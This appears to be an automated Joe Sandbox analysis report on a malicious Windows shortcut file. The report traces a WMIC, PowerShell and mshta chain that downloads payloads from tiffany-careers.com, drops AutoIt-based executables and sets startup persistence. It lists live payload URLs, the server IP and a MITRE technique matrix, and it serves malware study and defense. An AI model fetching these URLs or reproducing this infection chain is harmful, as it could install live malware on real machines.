Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85DC1C GetLocalTime,15_2_00007FF7BB85DC1C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB842BCF GetUserNameW,15_2_00007FF7BB842BCF
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB822400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_00007FF7BB822400
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB801D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,15_2_00007FF7BB801D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs\Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2512877983.0000029EF568A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2525206353.0000029EF5E11000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2421163066.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2411826471.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2426640424.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2430267866.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2425627754.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2411652132.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2416313436.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2426272022.0000000000D50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: rMpqCJnPv.exe, 0000000F.00000002.2357940183.0000021B0E419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2512877983.0000029EF568A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2512877983.0000029EF56E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: rMpqCJnPv.exeBinary or memory string: WIN_81
Source: rMpqCJnPv.exeBinary or memory string: WIN_XP
Source: rMpqCJnPv.exeBinary or memory string: WIN_XPe
Source: rMpqCJnPv.exeBinary or memory string: WIN_VISTA
Source: rMpqCJnPv.exe.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: rMpqCJnPv.exeBinary or memory string: WIN_7
Source: rMpqCJnPv.exeBinary or memory string: WIN_8
Source: Guard.exe.16.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB873940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_00007FF7BB873940
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB874074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00007FF7BB874074

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		21
Windows Management Instrumentation		1
Scripting		1
Exploitation for Privilege Escalation		2
Disable or Modify Tools		11
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares11
Input Capture		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell		2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
Timestomp		NTDS38
System Information Discovery		Distributed Component Object Model3
Clipboard Data		13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		1
DLL Side-Loading		LSA Secrets151
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		231
Masquerading		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Valid Accounts		DCSync13
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
Access Token Manipulation		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579660 Sample: FzmtNV0vnG.lnk Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 90 x1.i.lencr.org 2->90 92 tiffany-careers.com 2->92 94 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->94 100 Suricata IDS alerts for network traffic 2->100 102 Windows shortcut file (LNK) starts blacklisted processes 2->102 104 Multi AV Scanner detection for submitted file 2->104 106 15 other signatures 2->106 15 WMIC.exe 1 2->15         started        18 wscript.exe 2->18         started        20 svchost.exe 1 1 2->20         started        signatures3 process4 dnsIp5 134 Contains functionality to create processes via WMI 15->134 136 Creates processes via WMI 15->136 23 powershell.exe 7 15->23         started        26 conhost.exe 1 15->26         started        138 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->138 28 SwiftWrite.pif 18->28         started        98 127.0.0.1 unknown unknown 20->98 signatures6 process7 signatures8 112 Windows shortcut file (LNK) starts blacklisted processes 23->112 114 Drops PE files to the user root directory 23->114 116 Powershell drops PE file 23->116 30 powershell.exe 7 23->30         started        33 conhost.exe 23->33         started        process9 signatures10 132 Windows shortcut file (LNK) starts blacklisted processes 30->132 35 mshta.exe 17 30->35         started        process11 dnsIp12 96 tiffany-careers.com 147.45.49.155, 443, 49704, 49708 FREE-NET-ASFREEnetEU Russian Federation 35->96 74 C:\Users\user\AppData\Local\...\baochuan1[1], PE32 35->74 dropped 108 Windows shortcut file (LNK) starts blacklisted processes 35->108 110 Suspicious powershell command line found 35->110 40 powershell.exe 17 19 35->40         started        file13 signatures14 process15 file16 82 C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, PE32+ 40->82 dropped 118 Binary is likely a compiled AutoIt script file 40->118 44 rMpqCJnPv.exe 40->44         started        48 Acrobat.exe 67 40->48         started        50 conhost.exe 40->50         started        signatures17 process18 file19 88 C:\Users\Public\PublicProfile.ps1, ASCII 44->88 dropped 124 Windows shortcut file (LNK) starts blacklisted processes 44->124 126 Multi AV Scanner detection for dropped file 44->126 128 Suspicious powershell command line found 44->128 130 2 other signatures 44->130 52 powershell.exe 44->52         started        55 powershell.exe 44->55         started        57 AcroCEF.exe 105 48->57         started        signatures20 process21 file22 76 C:\Users\Public\Secure.au3, Unicode 52->76 dropped 59 Guard.exe 52->59         started        63 conhost.exe 52->63         started        78 C:\Users\Publicbehaviorgraphuard.exe, PE32 55->78 dropped 65 conhost.exe 55->65         started        67 AcroCEF.exe 57->67         started        process23 file24 84 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 59->84 dropped 86 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 59->86 dropped 120 Windows shortcut file (LNK) starts blacklisted processes 59->120 122 Drops PE files with a suspicious file extension 59->122 69 cmd.exe 59->69         started        signatures25 process26 file27 80 C:\Users\user\AppData\...\SwiftWrite.url, MS 69->80 dropped 72 conhost.exe 69->72         started        process28

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
FzmtNV0vnG.lnk26%VirustotalBrowse
FzmtNV0vnG.lnk21%ReversingLabsShortcut.Trojan.Pantera

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1]8%ReversingLabsWin32.Dropper.Lumma
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\rMpqCJnPv.exe30%ReversingLabsWin64.Downloader.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tiffany-careers.com
147.45.49.155
truefalse
    		high
    x1.i.lencr.org
    		unknown
    		unknownfalse
      		high
      nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://tiffany-careers.com/Job_Description.pdftrue
          		unknown
          https://tiffany-careers.com/rMpqCJnPv.exetrue
            		unknown
            https://tiffany-careers.com/baochuan1true
              		unknown
              https://tiffany-careers.com/gIpBYOitrue
                		unknown
                https://tiffany-careers.com/ygUmFny.txttrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://tiffany-careers.com/baochuan1ppowershell.exe, 00000005.00000002.2089152585.0000021D26231000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.autoitscript.com/autoit3/JGuard.exe, 00000016.00000000.2409567438.0000000000EA9000.00000002.00000001.01000000.00000010.sdmp, Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000001B.00000000.2554375542.0000000000939000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drfalse
                      		high
                      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.13.drfalse
                          		high
                          https://tiffany-careers.com/rpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://tiffany-careers.cpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://tiffany-careers.comWMIC.exe, 00000000.00000003.2061399182.000002902AA07000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.2063481089.000002902AA09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80AA0000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://tiffany-careers.com/baochuan1hpowershell.exe, 00000005.00000002.2089152585.0000021D266D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://tiffany-careers.com/rMpqCpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.microsoft.copowershell.exe, 00000014.00000002.2525206353.0000029EF5DE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://tiffany-careers.com/powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmptrue
                                                		unknown
                                                https://tiffany-careers.com/rMpqCJnpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.2119800024.000001DC58060000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.drfalse
                                                    		high
                                                    https://tiffany-careers.com/rMpqpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://tiffany-careers.com/baochuan1;.powershell.exe, 00000005.00000002.2089011782.0000021D24620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.autoitscript.com/autoit3/Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drfalse
                                                          		high
                                                          https://tiffany-careers.com/rMpqCJnPv.powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://tiffany-careers.com/rMpqCJnPvpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000007.00000003.2119800024.000001DC580D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.drfalse
                                                                  		high
                                                                  https://tiffany-careers.com/baochuan1$global:?powershell.exefalse
                                                                    		unknown
                                                                    https://tiffany-careers.com/rMpqCJnPv.epowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://tiffany-careers.com/rMpqCJpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://contoso.com/powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://tiffany-careers.copowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              		unknown
                                                                              https://tiffany-careers.com/rMpqCJnPpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://aka.ms/pscore68powershell.exe, 00000005.00000002.2089152585.0000021D2628C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2089152585.0000021D26263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://tiffany-careers.com/rMpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://tiffany-careers.com/baochuan1Y0powershell.exe, 00000005.00000002.2088198399.0000021D243AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2089152585.0000021D26245000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://tiffany-careers.compowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://tiffany-careers.com/rMppowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://tiffany-careers.com/rMpqCJnPv.expowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              147.45.49.155
                                                                                              		tiffany-careers.comRussian Federation
                                                                                              		2895FREE-NET-ASFREEnetEUfalse

                                                                                              Private

                                                                                              IP
                                                                                              127.0.0.1

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1579660
                                                                                              Start date and time:2024-12-23 07:10:36 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 8m 27s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:28
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Sample name:FzmtNV0vnG.lnk
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:ac9d5bb32e4d1c1cf52bf17bfdd8cf7b.lnk
                                                                                              Detection:MAL
                                                                                              Classification:mal100.expl.evad.winLNK@43/61@4/2
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 33.3%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 97%
                                                                                              • Number of executed functions: 50
                                                                                              • Number of non-executed functions: 250
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .lnk

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 172.64.41.3, 162.159.61.3, 52.6.155.20, 52.22.41.97, 3.219.243.226, 3.233.129.217, 23.195.39.65, 23.32.238.88, 2.19.198.73, 23.32.238.161, 2.19.198.48, 23.32.238.99, 23.32.238.106, 2.19.198.42, 23.32.238.89, 2.19.198.66, 23.32.238.131, 23.32.238.96, 2.19.198.75, 23.32.238.155, 23.32.238.147, 23.32.238.137, 23.32.238.113, 23.32.238.145, 23.32.238.105, 23.32.238.154, 23.32.238.122, 23.32.238.136, 23.32.238.160, 13.107.246.63, 4.245.163.56, 23.56.162.204, 52.149.20.212
                                                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3556 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              01:11:28API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                              01:11:34API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                              01:11:35API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                              01:11:36API Interceptor135x Sleep call for process: powershell.exe modified
                                                                                              01:11:58API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                                                              01:12:41API Interceptor1332x Sleep call for process: Guard.exe modified
                                                                                              01:12:59API Interceptor274x Sleep call for process: SwiftWrite.pif modified
                                                                                              07:12:08AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/BFmcYQ.exe
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              tiffany-careers.comlKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              FREE-NET-ASFREEnetEUlKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.112.248
                                                                                              KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                                                              • 147.45.113.159
